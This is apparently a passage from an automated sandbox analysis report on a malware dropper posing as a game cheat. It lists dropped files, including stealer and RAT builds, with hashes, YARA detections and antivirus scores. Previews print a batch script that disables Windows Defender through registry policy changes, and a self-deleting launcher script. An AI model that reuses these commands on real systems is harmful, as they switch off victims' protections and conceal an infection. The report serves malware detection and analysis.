                                      SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                      C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):235008
                                      Entropy (8bit):6.052066943195521
                                      Encrypted:false
                                      SSDEEP:6144:tloZM+rIkd8g+EtXHkv/iD4OUCKbhS6FOAxDeebn4b8e1mSTi:voZtL+EP8OUCKbhS6FOAxDeebAo
                                      MD5:06129FFC46E854930CFCAA754CA1D487
                                      SHA1:E7C173C48AA107EC63BD6F9030C9EC6FE889D832
                                      SHA-256:10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
                                      SHA-512:B7121A2A65F317EDBC1B4DD8DEC427C277FAD2B521A211D1408BC06B79431C418DAD32ED61481C5EF49511CD167846E026A86147AE77BD9B0E607918FEB66AB9
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................@...K.......P...........................$................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                      C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2618108
                                      Entropy (8bit):7.520085871796446
                                      Encrypted:false
                                      SSDEEP:49152:UbA30txAAnyf8vPgcj+Sx5j2KKcnhhhMssVDpx:Ub5xAWsGPgcjXKcnhhTsZ
                                      MD5:6E01D4882274684F48E04436103AD57F
                                      SHA1:3B88DF5FC9E6973BF3ECB1E2ED759B86774CB290
                                      SHA-256:424497764BC1E2CD57F454D173DCEEB9DCD7F900AAF5060110DA629D11FADF8D
                                      SHA-512:3E5ED6EE7458F4662DD9BBE572620FC591E69FBC6D8E98013EC0F39A95EB9DA55561A232EEA23192FBC59368B99F99EE6A00DF23BCFF253C327AA3EB607C7D7E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 66%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7888384
                                      Entropy (8bit):7.978075960572594
                                      Encrypted:false
                                      SSDEEP:196608:i9FITY7Wgr4pQTsRB/DejGIKpj57IOTj0cnue:4FN96LRB/DejGHtIOTofe
                                      MD5:B76057DF968A944446F950DD4DDC6AEC
                                      SHA1:BB64DE1C677368764000D34C29528EAD2F48405C
                                      SHA-256:AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
                                      SHA-512:7F45198FE05013CEAB477784BDE2B1C4532607BD8BA8D9CFB09C5BB037DD2616086C8CB3AFD669B24EC89EEDBD270D00F1BD6BCE2644B40ED36B8F32FC5FDB31
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................r.......|K......0....@..........................0O..................@.................../.O....6..............................................................45.......................G.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0....J..........................`..`.vmp1....Xx......Zx.................`..`.....................................................................................................................................................$..............@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\FixTsDfhiC.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):13304832
                                      Entropy (8bit):7.991054831548809
                                      Encrypted:true
                                      SSDEEP:393216:aJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8:abQpgssCKInwjJaM
                                      MD5:7DB5128F7A81CC1AF094D8898E79FF21
                                      SHA1:D503984331D5999C14931C267D859FBD1510C282
                                      SHA-256:2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
                                      SHA-512:CACEEC284B71DF124D47267E5CA42BF84E558AA9606B0186F132FBA8D2BEAD2DDBD9304CD82761270B6C42271E0937AEFF605EF5D865C424CC29B39CA05B123A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 75%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*......................x.....l.q......0....@...........................v..................@......................O...t.t......pv.P7....................................................n.......................r.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0...............................`..`.vmp1...0...........................`..`.rsrc...P7...pv..8..................@..P.............................................................................................................$..............@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.bat

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):211
                                      Entropy (8bit):5.2013909867484625
                                      Encrypted:false
                                      SSDEEP:6:hITg3Nou11r+DE8RN5OwAiBuCSKOZG1wkn23f+iMH:OTg9YDEANEwAEzIfk
                                      MD5:E5D6AB7B38B044D3F12F05915DDDB8B9
                                      SHA1:E97633BDC36361D15686A57449A95FEAD9DE5F6B
                                      SHA-256:E3ABC61BBE121E90EEFEEA1B3B6417BC69F2297320A39C368FCA2E53E45A241E
                                      SHA-512:0FB394BD3DEF72F7E262B1E8CF0D36FFF0B3ECF529D770B81608322BC21F876BCCBC45F94BA0AC126D71C9BB269956681F01D9E3314A1E1087AED91B5A3DE83E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Nu8jJRNGRr.bat"

                                      C:\Users\user\AppData\Local\Temp\aliRzOxVmS

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.213660689688185
                                      Encrypted:false
                                      SSDEEP:3:WOW1cb:vW2b
                                      MD5:599052E719673372AD89EB43715E9B57
                                      SHA1:0EE11A83D21607E70FA7288932FB8985A599F09D
                                      SHA-256:89F673145D936E0112BDF585932BDF12445392BC22EF2D04D0B81496C96F337D
                                      SHA-512:075DC25BE760999B78A5FF0A95F043FA004C33135B072CC0E1CD9CD81A64B78A757CAB5D234E9DD242D0C920CCA771F5D13F5E191C844F3A29D315BE9D4876B4
                                      Malicious:false
                                      Preview:URpTmppKDfykDYFHTIetjZEXE

                                      C:\Users\user\AppData\Local\Temp\windows defender.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\FixTsDfhiC.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):3135
                                      Entropy (8bit):5.017771879220886
                                      Encrypted:false
                                      SSDEEP:96:5UKNozkU9yryxh2VokttSTKlAHlRFH4rPNJLoJ:bD0
                                      MD5:4C35B71D2D89C8E8EB773854085C56EA
                                      SHA1:EDE16731E61348432C85EF13DF4BEB2BE8096D9B
                                      SHA-256:3EFEEAAABFD33FF95934BEE4D6D84E4ECB158D1E7777F6EECD26B2746991ED42
                                      SHA-512:A6CCBB2913738CA171686A2DD70E96330B0972DADB64F7294AC2B4C9BB430C872ED2BCD360F778962162B9E3BE305836FA7F6762B46310C0AD4D6EF0C1CDAC8D
                                      Malicious:true
                                      Preview:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protecti

                                      C:\Users\user\Videos\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (571), with no line terminators
                                      Category:dropped
                                      Size (bytes):571
                                      Entropy (8bit):5.85640612719744
                                      Encrypted:false
                                      SSDEEP:12:x315FiPpXlKCmSK5oIs/8uZEYWPaL4aNpUM/AZ9jTzveKczznx:x3jFiRgq+oZ0uZgS4aNpZoWzznx
                                      MD5:2687BFC181F1B096694CA63AA4488E39
                                      SHA1:02C36C262D529E8B4101B5AD4B81A7E7737DE15E
                                      SHA-256:3C1E9F14B43EEAED612CFE42399F003A8235D7CBA99DA53B85067973C2C75399
                                      SHA-512:6110DF6742062FB09BC2926C29B012EEE4E7A24C9D7011239D162E7BDE3699AC9197AEE5E32FA5277EA658CB76EA6733CCE772F730794FE94628D61E3E9547E7
                                      Malicious:false
                                      Preview:88ZhBhdW3DjRb0pvM2452ZiD7zP7wvVv4F4pkYF6QLcXl18lH9jpmkrjaVjMRfkIsxWW6AKxw8oq6KcF0o0xLpJUYVPOz3ovkUpxflpGyv2n6AmP3eVnpx6CnC8kv683T3FmfokO8t8ZxgYXs9VUiBFxXmKdnEV2w8UD49uO4Go6ygPHok2vloVRxRP3eGl4XGmzLUdtPHabXJ90WDzDMjQImCPmu0txftis4a5TGIgdN34oSYgaRhsxzeMJF09YXm6nlR66Ig7DDx4sIlUVTTg8Bu2ZNwNPJHGk7QDBcjSvjouCjdAegoEEG8m0YgsWSr46qTv2hS3uAuYXAz0uvttfCCe8nMm505c2txVPrI6NuUDVkP0iq8ki8Z3ozxOVq73FSfnMekCnxfur8IXYVDP2V44U4rZ43khxb8DFloEF67vcpLprZz9msAtXkTRwKItM76PAESwr8J5XJbosBseDl4EaOpeSWR5yNifs5pmGCSnjEWOJojvbnqlD2zvYyeUqOHKk66wVGXASQfW2bVnwgdKh6c0G3NSi77V6LnMsxZVPpSwXc37c1hK

                                      C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\AppReadiness\6cb0b6c459d5d3

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):163
                                      Entropy (8bit):5.704453811784881
                                      Encrypted:false
                                      SSDEEP:3:rpv9gWj0C4zQDm8chxRpnQdUwaa9hBkhm9fRWmktNzYwMig9mtjivw:9v9pbbmNQdPaa902TktN8Adivw
                                      MD5:4CDDE345C191B9FA4A05E7BE5B955C2B
                                      SHA1:E07B7193D45C96B662D3E45515798E37F7DE3ACF
                                      SHA-256:A2106E2E11F30CB200C1BB939A39A68249C29317EB9CAE2AC8BA69BD6C2A789C
                                      SHA-512:A1396108244EABC95E75C469D731BBA03CC498285673BE51819999B9EEE0E571E6ACD65C13E65853E08AFD3230CDA8D3EF3315ED800B19855E632F4F26F8B8DA
                                      Malicious:false
                                      Preview:Q7LJXEem0sywQiFKuRXtcS6QV5fn7Yw3snbBp8QmmcyyeLL17hFgpLr8B5xcj1ob54EnGDfwAuG9dIwKtnqaTQOg5dAtKyDvyX3jGiu3CSf4Fre2Jms5LOIoqhrmDvlMqULGPMEL3wYAuTbO9HkiGIkjOO3i0H0QrTN

                                      C:\Windows\AppReadiness\dwm.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\INF\.NET Data Provider for Oracle\91e168f4ec1147

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):215
                                      Entropy (8bit):5.786343948557994
                                      Encrypted:false
                                      SSDEEP:6:+iwg5y6F/xUCZESSks9fVRWma7L/cTNXY:z15yQZZKn9fVRDuL/gNo
                                      MD5:F2D54BA219F7A2A6AEB303CBB1309048
                                      SHA1:F8931A51602FC011AC361A3B568C5A28F740407F
                                      SHA-256:5297F09D78106918D27F22A202CB5F09CC3B8A1331607468237738B878574373
                                      SHA-512:187353B27EC9142B91226B57397ACEB5801254ED21ECEB1A9658DADC1FFE9B7F09F7FC3398201E0C7C8A00EAFA2245BB87394D943A181CB57561A249749AC8AF
                                      Malicious:false
                                      Preview:iNrL0rV3Chhgirqaec1bUsqIPbj4aw3fCrxozKwmRbwyZTzSsTZyep20gj6YHbdPoCe03CkTqOK252s5lQMGWEBXy7HPOXe08hJXz9YqsGIQe94o1Ax1OW3jBHB64UEStU4YsVGm1gXP6v2yCdYNknllnjWs7bvYB0gKFf5g4K9s8nnQOM3a61rGsSvJ8Ypau9NGOrthh2Sao2n96GduiVb

                                      C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Performance\WinSAT\DataStore\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (844), with no line terminators
                                      Category:dropped
                                      Size (bytes):844
                                      Entropy (8bit):5.904049219234194
                                      Encrypted:false
                                      SSDEEP:12:HMiCHNnot14/DIISakcQSYxrSRTfKabssTfemlrm6C581lJX15OTOLiew+:HMiQVk14/FNDYyvPJC6C56JX1OOLiej
                                      MD5:BF7CC67DC60B2FE406B836407603F7B1
                                      SHA1:99D43001D975CB71BACBBE293994AD9F7E516687
                                      SHA-256:862F264E0293455209F7CACD0A52D06AE38ED05A84326F0CBBE133AC363E1989
                                      SHA-512:51B8C54CAE46F5F57068E395F7BD1DB8CC6A89A0BB5D77AB53648664B461F31073D88F9E2ECC52B8AE28DCE37B3EFAF03DAC4C1075DC43D4A395B31CAAA095AA
                                      Malicious:false
                                      Preview:H4WGdn5LDGitl1ATfUv6HTbFqrmdn9jFLtHUhbXe4EnNpB4fnnCMQcsxcQavAbhDgdh2uqwD6QBCpNapxG0A7XytBT1QBmddhkqLdCv608PAbpIPzv73kgGJoy0azfCUwifFhOLuV4J8HyRVLmbPok2AdghoLUHV65N3KDrkjMiqXIC0gfPNDxpMpflBrhjBxyBMlYKH41pbBLnVerHpE4RIPANpcq2Bnh3jGzOHUHSMHNKe2PgAa363g36kLfpO8nyeSDPoc9V7lEBCztxMJ2lukACN3n6zcEOdZpLyA2hai9Rb14vcscEFCD4SBBvyDgegzimJh9MQVLLlskV82dG99JbVv3w8HsXCeumTSl4tQxt01Sjaqw5jZfgqGQYoMNJmyJH78BqRiXsMZkdcTVSVwxm8N5MBMQgCoHCsLlcoFoACxUQfw5V05xzAhItCzpES0phSivRr3nPIwkL2prOR4pH0RBKC1ZzajrLHx77Bno7SirN670XHaxXKiqBhkPzeyziEYDFrtNnQszSjxOEABr9wUAjG6aaYyddtJIh4vqYNJHctYbtWKycGzvuYe9uTxObOVjaoqKPVTwmMh0reqDOAAW3XYJav5Ea5pNXzBEp9iHxDIi0oRPmt9bN8pDQhueZOWrhUc2dmYOb3i0OzSwdpcq5N9ZK8yHPErjrbAgLZwAUv9UZyyaO7AtwpwTUDsfxQ8XM9JxzwkE3bWKOp9VJX2RE8xBoqLIrQMEwmHapBlcX5zUTmFoEWVaXrSOMHIIkbXnORXlhiqIva4IIcsClgEU4vqFT3Oh2d15iMFBOeHfqNp6wJFtYGhDXCsckSSnUIQSi9

                                      C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Setup\State\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (933), with no line terminators
                                      Category:dropped
                                      Size (bytes):933
                                      Entropy (8bit):5.882878605603488
                                      Encrypted:false
                                      SSDEEP:24:sB2z2tC3m6Lb+ojiIke4qqcyd8QzNP9U8S20a:i2z13nn+oiIkhN8QPBSHa
                                      MD5:F5B3C7249CF2BFFF5E772E6D669A27A5
                                      SHA1:9A0C8E676709002C3E0E05A4A569A909455C3B09
                                      SHA-256:6379E1113AA7451DAF7AD786BB019278DC8E1871A5CEDE201FACFC430A183D29
                                      SHA-512:A7A828A9AC97AAE8721A4680F3AB70247751DE0384568BE060F0BE91C5938A2F42E8BEBB4B58D42438446E2A9703E0F93BE762EDD39CD171E162CEC80A74D8D4
                                      Malicious:false
                                      Preview:Q4O9PEZ5ZWo566M76oeuCGxWrbh1QDERlcxF0TTpe3RZUmvEA66Eny2JH1SxgioWRWTeJGGnVzQJzXCFpd0UGAowjo89BfI5O4I8SR54zTtxisTuzMHDsUQRsh5fHGmzqU54OEwYi5ewR0O0UOKyYFN4o1PvVZwsr4HNxYfvZtewzd91SFK36xblHBQXyBCIIwEXtAC5tYYokbFK1XcQP3w3cgGwIH7YqWnDYmISCPKhZwAp5Ffaiv3P9L4M4Qwlb98OxCwOPKO9tOeqfa0Dmgz4cYDNs5YvcjFZyw23TQLYh3fvrNrdat94KDvY8igTwchKIE2ti6tVVbXj2RgeO4VsjLPvAd4uu1mEWVnmV85d9njtpMgrCCF1Gyk7zGsEB9lezSNho3IP92s6lgFy7Nsrwu7hupxOQ0bACE3X88CI3z1OGoVTB3HyQ3rEUpw8G39Jar3hmsz8Kjy72tbGUeNWsnuJXzCSMDB9zsyYvyqTDJnqFuLlOqomqmbw7tJwqgwHhyHK5DVfx4TjADEnnaEgZZTNQBaCo4mgWgIQnBqLUIzwT1w3ogJPcQrIe333mT12RwMe4x9mu2LQjh3ZOgXIuXEFyAwtHwjBR6ehoS90ggfkFbi7AepF5sI4sGp4BQe7TJ8nCWu5hglO1eAWbzsnHdFjykzhmFzPBiQ5d54outiZH3COGTcMh1zzDZycgMSbqVMTNE3g4E3Y5qb4hlbTnnsKsb1DGcHhaGsvrtABZ5Rd8b4X7445u9yDnBlwMzac6V7y7qMykZ3sVOLQgeGLhMwbRpHpHOykeygneFZQrGUUFGrZ0UPssP5uighSihqVlTNhsiwbFzeb1bVL7szx9G2P3vE8iGrKZ8tw3KqRixm2ud3GKVU0r3Wea7n6ey38ITB2sjSxBiOLd9eZ27xMv1cgmOV5guwu4

                                      C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
